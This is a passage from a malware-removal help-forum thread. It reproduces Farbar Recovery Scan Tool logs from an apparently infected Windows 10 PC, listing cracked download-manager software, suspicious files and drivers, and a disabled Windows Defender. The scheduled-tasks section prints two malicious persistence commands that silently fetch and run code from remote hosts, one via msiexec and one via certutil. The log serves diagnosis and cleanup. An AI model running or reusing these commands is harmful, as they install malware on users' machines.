    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
    2019-02-08 22:56 - 2019-02-08 22:56 - 000000000 ____D C:\Program Files (x86)\MSBuild
    2019-02-08 22:55 - 2015-06-17 18:10 - 001166520 _____ (Microsoft Corporation) C:\Windows\system32\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-06-17 18:10 - 000035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
    2019-02-08 22:55 - 2015-05-29 21:07 - 000778936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
    2019-02-08 22:55 - 2015-05-29 21:07 - 000035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
    2019-02-08 22:46 - 2019-02-08 22:46 - 000000836 __RSH C:\ProgramData\ntuser.pol
    2019-02-08 22:28 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\fsmysd5hgd4
    2019-02-08 22:22 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\htpaossc1dy
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 22:22 - 2019-02-08 22:22 - 000003704 _____ C:\Windows\System32\Tasks\iewiouoxxf
    2019-02-08 22:22 - 2019-02-08 22:22 - 000003486 _____ C:\Windows\System32\Tasks\hjuzju
    2019-02-08 22:22 - 2019-02-08 22:22 - 000000009 _____ C:\Users\Thomazing!\rstr3.ini
    2019-02-08 22:11 - 2019-02-09 01:02 - 000000004 _____ C:\ProgramData\lock.dat
    2019-02-08 22:11 - 2019-02-09 00:44 - 000000032 _____ C:\ProgramData\irw.atsd
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ C:\ProgramData\ts.dat
    2019-02-08 22:09 - 2019-02-08 22:09 - 000000000 ____D C:\ProgramData\localNETService
    2019-02-08 22:08 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\dwdqael1vpm
    2019-02-08 22:03 - 2019-02-08 22:03 - 000004138 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{166847B2-00F9-4170-B86A-AB179FF4BAF1}
    2019-02-08 22:03 - 2019-02-08 22:03 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Macromedia
    2019-02-08 22:00 - 2019-02-08 22:00 - 000004608 _____ C:\Windows\SECOH-QAD.exe
    2019-02-08 22:00 - 2019-02-08 22:00 - 000003584 _____ C:\Windows\SECOH-QAD.dll
    2019-02-08 21:58 - 2019-02-09 00:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\DMCache
    2019-02-08 21:58 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\p542dcem2lr
    2019-02-08 21:58 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Video
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\Downloads\Compressed
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\ProgramData\IDM
    2019-02-08 21:58 - 2019-02-08 21:58 - 000000000 ____D C:\Program Files (x86)\Internet Download Manager
    2019-02-08 21:50 - 2019-02-08 23:06 - 000000000 ____D C:\Windows\SysWOW64\SSL
    2019-02-08 21:50 - 2019-02-08 23:01 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\WhiteClick
    2019-02-08 21:50 - 2019-02-08 21:50 - 001612288 _____ C:\Windows\bxetfbicyncsflqei.bxetf
    2019-02-08 21:49 - 2019-02-08 23:06 - 000000000 ____D C:\ProgramData\boost_interprocess
    2019-02-08 21:49 - 2019-02-08 21:52 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Opera Software
    2019-02-08 21:49 - 2019-02-08 21:49 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc
    2019-02-08 21:48 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\la5jchefohd
    2019-02-08 21:48 - 2019-02-08 21:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\znnxx0e21dn
    2019-02-08 21:47 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\DiskWMpower
    2019-02-08 21:47 - 2019-02-08 21:47 - 000003756 _____ C:\Windows\System32\Tasks\{793C8F45-2D37-6E42-38A1-4FC6F516C21B}
    2019-02-08 21:47 - 2019-02-08 21:47 - 000003626 _____ C:\Windows\System32\Tasks\{CCA8B79B-43C5-96CB-2514-85E1469B3E7C}
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ C:\Users\Thomazing!\AppData\Local\wbem.ini
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Mozilla
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000000 ____D C:\Program Files (x86)\Multitimer
    2019-02-08 21:46 - 2019-02-09 00:43 - 000003612 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-02-08 21:46 - 2019-02-09 00:43 - 000003290 _____ C:\Windows\System32\Tasks\csrss
    2019-02-08 21:46 - 2019-02-09 00:39 - 000000000 ____D C:\Program Files (x86)\Cta
    2019-02-08 21:46 - 2019-02-08 23:16 - 000000000 ____D C:\Program Files (x86)\0qfoy55me3i
    2019-02-08 21:46 - 2019-02-08 21:48 - 008019296 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
    2019-02-08 21:46 - 2019-02-08 21:48 - 001123400 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 001895384 _____ C:\Users\Thomazing!\AppData\Local\Namfresh.bin
    2019-02-08 21:46 - 2019-02-08 21:46 - 000621928 _____ (VxDriver) C:\Windows\B62CD2D3FFB1.sys
    2019-02-08 21:46 - 2019-02-08 21:46 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\Opera Software
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\ProgramData\Polygens
    2019-02-08 21:46 - 2019-02-08 21:46 - 000000000 ____D C:\ProgramData\Logic Cramble
    2019-02-08 21:45 - 2019-02-08 23:05 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\uTorrent
    2019-02-08 21:45 - 2019-02-08 21:52 - 000722944 _____ C:\Users\Thomazing!\AppData\Local\sham.db
    2019-02-08 21:45 - 2019-02-08 21:45 - 007881728 _____ C:\Users\Thomazing!\AppData\Local\agent.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 002038046 _____ C:\Users\Thomazing!\AppData\Local\Silsoning.tst
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Silsoning.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Joybam.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000278510 _____ C:\Users\Thomazing!\AppData\Local\Joybam.tst
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ C:\Users\Thomazing!\AppData\Local\installer.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000126464 _____ C:\Users\Thomazing!\AppData\Local\noah.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000070896 _____ C:\Users\Thomazing!\AppData\Local\Config.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000053888 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\TVALZ_O.SYS
    2019-02-08 21:45 - 2019-02-08 21:45 - 000045720 _____ (Toshiba Corporation) C:\Windows\system32\Drivers\Thotkey.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000044208 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\tosrfec.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000035584 _____ (Western Digital Technologies, Inc.) C:\Windows\system32\Drivers\wdcsam64.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000018432 _____ C:\Users\Thomazing!\AppData\Local\Main.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000017920 _____ (TOSHIBA Corporation) C:\Windows\system32\Drivers\FwLnk.sys
    2019-02-08 21:45 - 2019-02-08 21:45 - 000016368 _____ C:\Users\Thomazing!\AppData\Local\InstallationConfiguration.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000005568 _____ C:\Users\Thomazing!\AppData\Local\md.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000003088 _____ C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000881 _____ C:\Users\Thomazing!\AppData\Roaming\Microsoft\Windows\Start Menu\猥orrent.lnk
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Synaptics
    2019-02-08 21:45 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files (x86)\foldershare
    2019-02-08 21:44 - 2019-02-08 21:45 - 000000000 ____D C:\ProgramData\VMR6PC5JA6GYC9V0XH3B
    2019-02-08 21:44 - 2019-02-08 21:44 - 001795952 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01011.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000722672 _____ (Synaptics Incorporated) C:\Windows\system32\SynCOM.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000528112 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
    2019-02-08 21:44 - 2019-02-08 21:44 - 000422128 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo19.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000400112 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCom.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000251632 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
    2019-02-08 21:44 - 2019-02-08 21:44 - 000169712 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCom.dll
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\Users\Thomazing!\AppData\Roaming\WinRAR
    2019-02-08 21:42 - 2019-02-08 21:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
    2019-02-08 21:41 - 2019-02-08 21:41 - 003141232 _____ (Alexander Roshal) C:\Users\Thomazing!\Downloads\winrar-x64-57b1.exe
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\WinRAR
    2019-02-08 21:41 - 2019-02-08 21:41 - 000000000 ____D C:\Program Files\VideoLAN
    2019-02-08 21:37 - 2019-02-08 21:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
    2019-02-08 21:35 - 2019-02-08 21:35 - 010627744 _____ (Intel Corporation) C:\Windows\system32\Drivers\igdkmd64.sys
    2019-02-08 21:35 - 2019-02-08 21:35 - 006593816 _____ (Intel Corporation) C:\Windows\system32\igdumd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004931384 _____ (Intel Corporation) C:\Windows\SysWOW64\igdumd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004755784 _____ (Intel Corporation) C:\Windows\system32\igd10umd64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 004370016 _____ (Intel Corporation) C:\Windows\SysWOW64\igd10umd32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 001991936 _____ C:\Windows\system32\iglhxa64.cpa
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\SysWOW64\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000982240 _____ C:\Windows\system32\igkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\SysWOW64\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000439308 _____ C:\Windows\system32\igcompkrng500.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000208896 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhsip32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000206336 _____ (Intel Corporation) C:\Windows\system32\iglhsip64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000188416 _____ (Intel Corporation) C:\Windows\system32\iglhcp64.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000147456 _____ (Intel Corporation) C:\Windows\SysWOW64\iglhcp32.dll
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\SysWOW64\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000092356 _____ C:\Windows\system32\igfcg500m.bin
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060254 _____ C:\Windows\system32\iglhxg64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060226 _____ C:\Windows\system32\iglhxc64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000060015 _____ C:\Windows\system32\iglhxo64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000005424 _____ C:\Windows\system32\iglhxs64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000001090 _____ C:\Windows\system32\iglhxa64.vp
    2019-02-08 21:35 - 2019-02-08 21:35 - 000000000 ____D C:\Windows\PCHEALTH
    2019-02-08 21:34 - 2019-02-08 21:34 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
    2019-02-08 21:33 - 2019-02-08 21:45 - 000000000 ____D C:\Program Files\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:35 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 __RHD C:\MSOCache
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Microsoft Help
    2019-02-08 21:33 - 2019-02-08 21:33 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
    2019-02-08 21:26 - 2019-02-08 23:17 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\Google
    2019-02-08 21:26 - 2019-02-08 23:02 - 000000000 ____D C:\Program Files (x86)\Google
    2019-02-08 21:26 - 2019-02-08 21:26 - 001136176 _____ (Google Inc.) C:\Users\Thomazing!\Downloads\ChromeSetup.exe
    2019-02-08 21:24 - 2019-02-08 21:24 - 000000000 ____D C:\Users\Thomazing!\AppData\Local\MicrosoftEdge
    2019-02-07 17:10 - 2019-02-07 17:10 - 000098203 _____ C:\Windows\uninstaller.dat

    ==================== One month (modified) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-02-09 13:19 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\rescache
    2019-02-09 13:16 - 2015-07-10 17:47 - 000000000 ____D C:\Windows\system32\Sysprep
    2019-02-09 13:14 - 2015-07-31 06:42 - 000028672 _____ C:\Windows\system32\config\BCD-Template
    2019-02-09 00:52 - 2015-07-31 06:40 - 000000000 ____D C:\Windows\INF
    2019-02-09 00:43 - 2015-07-31 05:52 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2019-02-09 00:42 - 2015-07-10 17:05 - 000131072 ___SH C:\Windows\system32\config\BBI
    2019-02-08 23:59 - 2015-09-10 13:44 - 000000000 __RHD C:\Users\Public\AccountPictures
    2019-02-08 22:56 - 2015-07-31 06:25 - 000000000 ____D C:\Windows\CbsTemp
    2019-02-08 22:45 - 2015-07-31 06:42 - 000000000 ___HD C:\Windows\system32\GroupPolicy
    2019-02-08 22:08 - 2015-07-31 05:49 - 000277768 _____ C:\Windows\system32\FNTCACHE.DAT
    2019-02-08 21:46 - 2015-07-31 06:42 - 000000000 ____D C:\Windows\AppReadiness
    2019-02-08 21:39 - 2015-07-31 06:42 - 000000000 ___HD C:\Program Files\WindowsApps
    2019-02-08 21:34 - 2015-07-31 06:42 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
    2019-02-08 21:33 - 2015-09-10 13:21 - 000000000 ____D C:\Windows\ShellNew

    ==================== Files in the root of some directories =======

    2019-02-08 22:11 - 2019-02-09 01:02 - 000000004 _____ () C:\ProgramData\lock.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-02-08 21:45 - 2019-02-08 21:45 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-02-08 22:11 - 2019-02-08 22:11 - 000000008 _____ () C:\ProgramData\ts.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Program Files (x86)\iUOI.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000180736 ____N (Microsoft Corporation) C:\Program Files (x86)\OKseaoP.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 007881728 _____ () C:\Users\Thomazing!\AppData\Local\agent.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000070896 _____ () C:\Users\Thomazing!\AppData\Local\Config.xml
    2019-02-08 22:22 - 2019-02-08 22:22 - 006161408 _____ () C:\Users\Thomazing!\AppData\Local\dump007.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000016368 _____ () C:\Users\Thomazing!\AppData\Local\InstallationConfiguration.xml
    2019-02-08 21:45 - 2019-02-08 21:45 - 000140800 _____ () C:\Users\Thomazing!\AppData\Local\installer.dat
    1601-01-03 21:26 - 1601-01-03 21:26 - 000058368 ____N (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\IOIiIOa.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Joybam.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 000278510 _____ () C:\Users\Thomazing!\AppData\Local\Joybam.tst
    2019-02-08 21:45 - 2019-02-08 21:45 - 000018432 _____ () C:\Users\Thomazing!\AppData\Local\Main.dat
    2019-02-08 21:45 - 2019-02-08 21:45 - 000005568 _____ () C:\Users\Thomazing!\AppData\Local\md.xml
    2019-02-08 21:46 - 2019-02-08 21:46 - 001895384 _____ () C:\Users\Thomazing!\AppData\Local\Namfresh.bin
    2019-02-08 21:45 - 2019-02-08 21:45 - 000126464 _____ () C:\Users\Thomazing!\AppData\Local\noah.dat
    2019-02-08 21:45 - 2019-02-08 21:52 - 000722944 _____ () C:\Users\Thomazing!\AppData\Local\sham.db
    2019-02-08 21:45 - 2019-02-08 21:45 - 001632256 _____ (TODO: <Company name>) C:\Users\Thomazing!\AppData\Local\Silsoning.exe
    2019-02-08 21:45 - 2019-02-08 21:45 - 002038046 _____ () C:\Users\Thomazing!\AppData\Local\Silsoning.tst
    2019-02-08 21:46 - 2019-02-08 21:46 - 000032038 _____ () C:\Users\Thomazing!\AppData\Local\uninstall_temp.ico
    2019-02-08 21:47 - 2019-02-08 21:47 - 000000003 _____ () C:\Users\Thomazing!\AppData\Local\wbem.ini

    Files to move or delete:
    ====================
    C:\Program Files (x86)\Multitimer\Multitimer.exe
    C:\Program Files (x86)\0qfoy55me3i\ESDJ37B9ITN0QK9.exe
    C:\Users\Thomazing!\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe


    Some files in TEMP:
    ====================
    2019-02-08 21:46 - 2019-02-08 21:46 - 001527488 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\dbghelp.dll
    2019-02-08 21:44 - 2019-02-08 21:47 - 025260414 _____ (TigerTrade ) C:\Users\Thomazing!\AppData\Local\Temp\ezdyyd.exe
    2019-02-08 21:45 - 2019-02-08 21:46 - 000672090 _____ (FAZ ) C:\Users\Thomazing!\AppData\Local\Temp\global_installer.exe
    2019-02-08 21:44 - 2019-02-08 21:55 - 002892544 _____ (BitTorrent Inc.) C:\Users\Thomazing!\AppData\Local\Temp\IDM_Serial_Number_Crack_Patch_Free_2019_Serial_Keys.exe
    2019-02-08 22:22 - 2019-02-09 00:31 - 000000000 ____D () C:\Users\Thomazing!\AppData\Local\Temp\ImagingEngine.dll
    2019-02-08 21:46 - 2019-02-08 21:46 - 001385984 _____ (wj32) C:\Users\Thomazing!\AppData\Local\Temp\installer_mi.exe
    2019-02-08 21:46 - 2019-02-08 21:48 - 001905784 _____ (Google Inc.) C:\Users\Thomazing!\AppData\Local\Temp\mcasin.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 000375522 _____ ( ) C:\Users\Thomazing!\AppData\Local\Temp\ncyvgt4vxoc.exe
    2019-02-08 21:46 - 2019-02-08 21:46 - 000167616 _____ (Microsoft Corporation) C:\Users\Thomazing!\AppData\Local\Temp\symsrv.dll
    2019-02-08 21:51 - 2019-02-08 21:47 - 000099906 _____ () C:\Users\Thomazing!\AppData\Local\Temp\Uninstall.exe
    2019-02-08 21:44 - 2019-02-08 21:45 - 004500992 _____ () C:\Users\Thomazing!\AppData\Local\Temp\xtex.exe

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\dllhost.exe => File is digitally signed
    C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

    BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully

    LastRegBack: 2019-02-09 13:15

    ==================== End of FRST.txt ============================

  2. #2
    Join Date
    Jul 2008
    Posts
    232
    ADDITION


    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 6.02.2019
    Ran by Thomazing! (09-02-2019 01:03:19)
    Running from C:\Users\Thomazing!\Downloads
    Windows 10 Pro 10240.16487 (X64) (2019-02-09 05:18:42)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-3408261874-2140888000-2142219774-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-3408261874-2140888000-2142219774-503 - Limited - Disabled)
    Guest (S-1-5-21-3408261874-2140888000-2142219774-501 - Limited - Disabled)
    Thomazing! (S-1-5-21-3408261874-2140888000-2142219774-1001 - Administrator - Enabled) => C:\Users\Thomazing!

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    猥orrent (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
    Alien Team (HKLM-x32\...\{52811919-39BB-4C90-95A6-323FA6636B29}_is1) (Version: 1 - Alien Team)
    CCleaner (HKLM\...\CCleaner) (Version: 5.52 - Piriform)
    CloudNet (HKU\S-1-5-21-3408261874-2140888000-2142219774-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
    DiskWMpower version 1.0 (HKLM-x32\...\DiskWMpower_is1) (Version: 1.0 - WeMonetize) <==== ATTENTION
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.96 - Google Inc.)
    Google Toolbar for Internet Explorer (HKLM-x32\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
    Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
    Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
    IDM Crack 6.25 build 20 (HKLM-x32\...\IDM Crack 6.25 build 20) (Version: build 21 - Crackingpatching.com Team)
    Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
    Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.4763.1000 - Microsoft Corporation)
    Multitimer version 1.0 (HKLM-x32\...\Multitimer_is1) (Version: 1.0 - ) <==== ATTENTION
    Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.10.51 - Synaptics Incorporated)
    TotalAV (HKLM-x32\...\TotalAV) (Version: 4.10.38 - TotalAV)
    VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
    WinRAR 5.70 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.70.1 - win.rar GmbH)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc. -> Tonec Inc.)
    ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-01-28] (win.rar GmbH -> Alexander Roshal)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {25681BAB-9719-40FC-87F6-A290829EB501} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2019-01-10] (Piriform Software Ltd -> Piriform Software Ltd)
    Task: {34F52A04-A693-4743-95C8-BD2D08D5B443} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-02-08] () [File not signed] <==== ATTENTION
    Task: {38519D9A-952D-4D91-9C1A-8C4F1933B519} - System32\Tasks\iewiouoxxf => "msiexec" /q -package hxxps://superdomain1709.info/qolsfioklpiu.huu
    Task: {43DBA25B-CE5F-49A9-898C-47539A2F79EE} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://krokas.info/app/app.exe C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Thomazing!\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {71E02E5A-83AD-4151-B826-04CEFE0C7B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2019-02-08] (Google Inc -> Google Inc.)
